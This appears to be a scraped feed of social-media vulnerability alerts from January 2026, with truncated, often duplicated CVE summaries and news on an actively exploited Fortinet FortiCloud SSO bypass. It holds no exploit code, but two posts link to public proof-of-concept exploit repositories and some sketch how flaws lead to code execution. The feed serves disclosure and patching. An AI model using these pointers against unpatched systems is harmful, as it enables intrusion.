🟠 CVE-2026-24840 - High (8)
Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a hardcoded credential in the provided installation script (located at https://dokploy.com/install.sh, line 154) uses a hardcoded password when creating th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24840/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2025-67645 - High (8.8)
OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. An authenticated normal user can modify the request paramet...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67645/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2025-55292 - High (8.2)
Meshtastic is an open source mesh networking solution. In the current Meshtastic architecture, a Node is identified by their NodeID, generated from the MAC address, rather than their public key. This aspect downgrades the security, specifically by...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-55292/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24836 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, extensions could write richtext in log notes which can include script...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24836/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24833 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, a module could install with richtext in its description field which could contain scripts that will...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24833/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🔴 CVE-2026-24770 - Critical (9.8)
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24770/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24783 - High (7.5)
soroban-fixed-point-math is a fixed-point math library for Soroban smart contacts. In versions 1.3.0 and 1.4.0, the `mulDiv(x, y, z)` function incorrectly handled cases where both the intermediate product $x * y$ and the divisor $z$ were negative....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24783/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24778 - High (8.8)
Ghost is an open source content management system. In Ghost versions 5.43.0 through 5.12.04 and 6.0.0 through 6.14.0, an attacker was able to craft a malicious link that, when accessed by an authenticated staff user or member, would execute JavaSc...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24778/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
2 posts
🔴 CVE-2026-24736 - Critical (9.1)
Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24736/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-24736 - Critical (9.1)
Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24736/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24882 - High (8.4)
In GnuPG before 2.5.17, a stack-based buffer overflow exists in tpm2daemon during handling of the PKDECRYPT command for TPM-backed RSA and ECC keys.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24882/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-23593 - High (7.5)
A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affect...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23593/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-23881 - High (7.7)
Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-22258 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22258/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
2 posts
🟠 CVE-2026-24831 - High (7.5)
Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24831/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24831 - High (7.5)
Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24831/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
2 posts
🔴 CVE-2026-24874 - Critical (9.1)
Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-24874 - Critical (9.1)
Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in themrdemonized xray-monolith.This issue affects xray-monolith: before 2025.12.30.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24874/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-0648 - High (7.8)
The vulnerability stems from an incorrect error-checking logic in the CreateCounter() function (in threadx/utility/rtos_compatibility_layers/OSEK/tx_osek.c) when handling the return value of osek_get_counter(). Specifically, the current code chec...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24873 - High (7.8)
Out-of-bounds Read vulnerability in Rinnegatamante lpp-vita.This issue affects lpp-vita: before lpp-vita r6.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24873/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🔴 CVE-2026-24872 - Critical (9.8)
improper pointer arithmetic
vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24872/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🔴 CVE-2026-24832 - Critical (9.8)
Out-of-bounds Write vulnerability in ixray-team ixray-1.6-stcop.This issue affects ixray-1.6-stcop: before 1.3.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24832/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
4 posts
🟠 CVE-2025-65889 - High (7.5)
A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65889/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65889 - High (7.5)
A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65889/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65889 - High (7.5)
A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65889/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65889 - High (7.5)
A type validation flaw in the flow.dstack() component of OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65889/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
4 posts
🟠 CVE-2025-65888 - High (7.5)
A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65888/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65888 - High (7.5)
A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65888/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65888 - High (7.5)
A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65888/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65888 - High (7.5)
A dimension validation flaw in the flow.empty() component of OneFlow 0.9.0 allows attackers to cause a Denial of Service (DoS) via a negative or excessively large dimension value.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65888/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
4 posts
🟠 CVE-2025-65886 - High (7.5)
A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65886/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65886 - High (7.5)
A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65886/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65886 - High (7.5)
A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65886/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-65886 - High (7.5)
A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65886/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
3 posts
1 repos
‼️ CVE-2026-1056: Snow Monkey Forms <= 12.0.3 - Unauthenticated Arbitrary File Deletion via Path Traversal
PoC/Exploit: https://github.com/ch4r0nn/CVE-2026-1056-POC
CVSS: 9.8
CVE Published: January 28th, 2026
Advisory: https://github.com/advisories/GHSA-g5p3-f4cq-94v5
Details: The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
##‼️ CVE-2026-1056: Snow Monkey Forms <= 12.0.3 - Unauthenticated Arbitrary File Deletion via Path Traversal
PoC/Exploit: https://github.com/ch4r0nn/CVE-2026-1056-POC
CVSS: 9.8
CVE Published: January 28th, 2026
Advisory: https://github.com/advisories/GHSA-g5p3-f4cq-94v5
Details: The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
##🔴 CVE-2026-1056 - Critical (9.8)
The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthent...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1056/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🟠 CVE-2025-57283 - High (7.8)
The Node.js package browserstack-local 1.5.8 contains a command injection vulnerability. This occurs because the logfile variable is not properly sanitized in lib/Local.js.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57283/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-57283 - High (7.8)
The Node.js package browserstack-local 1.5.8 contains a command injection vulnerability. This occurs because the logfile variable is not properly sanitized in lib/Local.js.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57283/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🔴 CVE-2025-61140 - Critical (9.8)
The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61140/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-61140 - Critical (9.8)
The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61140/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🟠 CVE-2025-62514 - High (8.3)
Parsec is a cloud-based application for cryptographically secure file sharing. In versions on the 3.x branch prior to 3.6.0, `libparsec_crypto`, a component of the Parsec application, does not check for weak order point of Curve25519 when compiled...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-62514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-62514 - High (8.3)
Parsec is a cloud-based application for cryptographically secure file sharing. In versions on the 3.x branch prior to 3.6.0, `libparsec_crypto`, a component of the Parsec application, does not check for weak order point of Curve25519 when compiled...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-62514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🟠 CVE-2025-7714 - High (7.5)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows Command Line Execution through SQL Injection.This issue affe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7714/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-7714 - High (7.5)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows Command Line Execution through SQL Injection.This issue affe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7714/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🟠 CVE-2025-7713 - High (7.5)
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows XSS Through HTTP Headers.This issue affects Content M...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7713/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-7713 - High (7.5)
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows XSS Through HTTP Headers.This issue affects Content M...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7713/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🟠 CVE-2026-1616 - High (7.5)
The $uri$args concatenation in nginx configuration file present in Open Security Issue Management (OSIM) prior v2025.9.0 allows path traversal attacks via query parameters.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1616/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1616 - High (7.5)
The $uri$args concatenation in nginx configuration file present in Open Security Issue Management (OSIM) prior v2025.9.0 allows path traversal attacks via query parameters.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1616/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🟠 CVE-2025-7016 - High (8)
Improper Access Control vulnerability in Akın Software Computer Import Export Industry and Trade Ltd. QR Menu allows Authentication Abuse.This issue affects QR Menu: before s1.05.12.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7016/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-7016 - High (8)
Improper Access Control vulnerability in Akın Software Computer Import Export Industry and Trade Ltd. QR Menu allows Authentication Abuse.This issue affects QR Menu: before s1.05.12.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7016/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
1 posts
🟠 CVE-2026-24856 - High (7.8)
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Versions prior to 2.3.1.2 have an undefined behavior issue when floating-point NaN values are converted to...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24856/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
New.
NVIDIA GPU Display Drivers - January 2026 vulnerabilities: CVE-2025-33217, CVE-2025-33218, and CVE-2025-33219 https://nvidia.custhelp.com/app/answers/detail/a_id/5747 #Nvidia #infosec #vulnerability
##🟠 CVE-2025-33217 - High (7.8)
NVIDIA Display Driver for Windows contains a vulnerability where an attacker could trigger a use after free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33217/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
New.
NVIDIA GPU Display Drivers - January 2026 vulnerabilities: CVE-2025-33217, CVE-2025-33218, and CVE-2025-33219 https://nvidia.custhelp.com/app/answers/detail/a_id/5747 #Nvidia #infosec #vulnerability
##🟠 CVE-2025-33218 - High (7.8)
NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, escalation of privi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33218/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
New.
NVIDIA GPU Display Drivers - January 2026 vulnerabilities: CVE-2025-33217, CVE-2025-33218, and CVE-2025-33219 https://nvidia.custhelp.com/app/answers/detail/a_id/5747 #Nvidia #infosec #vulnerability
##🟠 CVE-2025-33219 - High (7.8)
NVIDIA Display Driver for Linux contains a vulnerability in the NVIDIA kernel module where an attacker could cause an integer overflow or wraparound. A successful exploit of this vulnerability might lead to code execution, escalation of privileges...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33219/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
1 posts
🟠 CVE-2025-46691 - High (7.8)
Dell PremierColor Panel Driver, versions prior to 1.0.0.1 A01, contains an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-46691/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
1 posts
🟠 CVE-2025-68662 - High (7.6)
Discourse is an open source discussion platform. In versions prior to 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0, a hostname validation issue in FinalDestination could allow bypassing SSRF protections under certain conditions. This issue is patched...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-68662/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🔴 CVE-2025-57795 - Critical (9.9)
Explorance Blue versions prior to 8.14.13 contain an authenticated remote file download vulnerability in a web service component. In default configurations, this flaw can be leveraged to achieve remote code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57795/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-57795 - Critical (9.9)
Explorance Blue versions prior to 8.14.13 contain an authenticated remote file download vulnerability in a web service component. In default configurations, this flaw can be leveraged to achieve remote code execution.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57795/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
2 posts
🔴 CVE-2025-57794 - Critical (9.1)
Explorance Blue versions prior to 8.14.9 contain an authenticated unrestricted file upload vulnerability in the administrative interface. The application does not adequately restrict uploaded file types, allowing malicious files to be uploaded and...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57794/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-57794 - Critical (9.1)
Explorance Blue versions prior to 8.14.9 contain an authenticated unrestricted file upload vulnerability in the administrative interface. The application does not adequately restrict uploaded file types, allowing malicious files to be uploaded and...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57794/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
1 posts
🟠 CVE-2026-24772 - High (8.9)
OpenProject is an open-source, web-based project management software. To enable the real time collaboration on documents, OpenProject 17.0 introduced a synchronization server. The OpenPrioject backend generates an authentication token that is curr...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24772/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
1 posts
🟠 CVE-2025-33220 - High (7.8)
NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a malicious guest could cause heap memory access after the memory is freed. A successful exploit of this vulnerability might lead to code execution, escalation of priv...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33220/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:00.867000
1 posts
🟠 CVE-2025-58150 - High (8.8)
Shadow mode tracing code uses a set of per-CPU variables to avoid
cumbersome parameter passing. Some of these variables are written to
with guest controlled data, of guest controllable size. That size can
be larger than the variable, and boundin...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-58150/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T13:16:51.047000
14 posts
4 repos
https://github.com/absholi7ly/CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass
📢 Fortinet corrige le zero-day CVE-2026-24858 dans FortiCloud SSO exploité activement
📝 Selon Help Net Security, Fortinet a commencé à diffuser des versions de FortiOS corrig...
📖 cyberveille : https://cyberveille.ch/posts/2026-01-30-fortinet-corrige-le-zero-day-cve-2026-24858-dans-forticloud-sso-exploite-activement/
🌐 source : https://www.helpnetsecurity.com/2026/01/28/fortinet-forticloud-sso-zero-day-vulnerability-cve-2026-24858/
#CVE_2026_24858 #FortiCloud_SSO #Cyberveille
Another day and, well . . .
##Fortinet SSO Is A Burning Trash Fire While Prague Bureaucrats Wait For Their Morning Fax
PANIC 88% | Lag 18.75h | Fortinet has released an emergency patch for CVE-2026-24858, a critical vulnerability in FortiOS Sin
#AfterShockIndex
Another day and, well . . .
##Fortinet SSO Is A Burning Trash Fire While Prague Bureaucrats Wait For Their Morning Fax
PANIC 88% | Lag 18.75h | Fortinet has released an emergency patch for CVE-2026-24858, a critical vulnerability in FortiOS Sin
#AfterShockIndex
Here's a summary of the latest in global technology and cybersecurity from the last 24 hours:
Global tech giants are streamlining: Amazon announced 16,000 job cuts (Jan 28, 2026). Meanwhile, AI investment surges, with SoftBank nearing a $30B OpenAI investment (Jan 28, 2026). In cybersecurity, Fortinet addressed active exploitation of CVE-2026-24858 (Jan 28, 2026), and OpenSSL patched 12 flaws, including RCE (Jan 29, 2026). The Illinois Department of Human Services suffered a data breach impacting ~700,000 individuals (Jan 28, 2026).
##Fortinet Patches Critical FortiOS SSO Authentication Bypass Under Active Attack
Fortinet patched a critical authentication bypass vulnerability (CVE-2026-24858) in FortiOS and related products that attackers are actively exploiting to hijack devices and steal configurations. CISA has mandated federal agencies to remediate the flaw by end of January 2026.
**Make sure all your Fortinet devices are isolated from the internet and accessible from trusted networks only. If you use FortiCloud SSO, you must upgrade your firmware immediately because Fortinet has blocked vulnerable versions from using the SSO service.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/fortinet-patches-critical-fortios-sso-authentication-bypass-under-active-attack-0-6-0-t-z/gD2P6Ple2L
Looks like Fortinet got the attention it was looking for.
New.
CISA: Fortinet Releases Guidance to Address Ongoing Exploitation of Authentication Bypass Vulnerability CVE-2026-24858 https://www.cisa.gov/news-events/alerts/2026/01/28/fortinet-releases-guidance-address-ongoing-exploitation-authentication-bypass-vulnerability-cve-2026 #CISA #Fortinet #infosec #vulnerability
###CISA Cyber Security Alerts & Advisories includes 26 Jan 2026 "five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog" & 27 Jan. Fortinet "CVE-2026-24858 Multiple Products Authentication Bypass" www.cisa.gov/news-events/... #cybersec #natsec #tech policy
##Fortinet confirms active exploitation of FortiCloud SSO auth bypass (CVE-2026-24858, CVSS 9.4).
Cross-customer access via trusted SSO paths observed.
SSO now blocked for vulnerable versions - patching required.
##Fortinet coupe le SSO en attendant les patchs pour la nouvelle faille zero-day : CVE-2026-24858 https://www.it-connect.fr/fortinet-coupe-le-sso-en-attendant-les-patchs-pour-la-nouvelle-faille-zero-day-cve-2026-24858/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Fortinet
##Here's a summary of recent important global, technology, and cybersecurity news:
Global: India has contained a Nipah virus outbreak (Jan 28, 2026). The EU approved a ban on Russian gas imports, effective from 2027 (Jan 27, 2026).
Technology: The EU is pressing Google to share AI and search data under new regulations (Jan 27, 2026). Samsung is nearing Nvidia approval for advanced HBM4 AI memory chips (Jan 27, 2026). Fujitsu developed AI for space weather prediction (Jan 28, 2026).
Cybersecurity: Microsoft issued emergency patches for an actively exploited Office zero-day vulnerability (CVE-2026-21509) (Jan 27, 2026). Fortinet patched a critical FortiOS SSO authentication bypass (CVE-2026-24858) under active exploitation (Jan 28, 2026). AI-powered polymorphic phishing attacks are also a growing concern (Jan 28, 2026).
##‼️CVE-2026-24858: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability
Severity: Critical
CVSS: 9.8
Zero Day: Yes
CVE Published: January 27th, 2026
Advisory: https://github.com/advisories/GHSA-2x38-48vp-w23x
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.6.0 through 7.6.5, FortiOS 7.4.0 through 7.4.10, FortiOS 7.2.0 through 7.2.12, FortiOS 7.0.0 through 7.0.18 may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.
##🔴 CVE-2026-24858 - Critical (9.8)
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24858/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T13:02:04.990000
2 posts
🟠 CVE-2026-24428 - High (8.8)
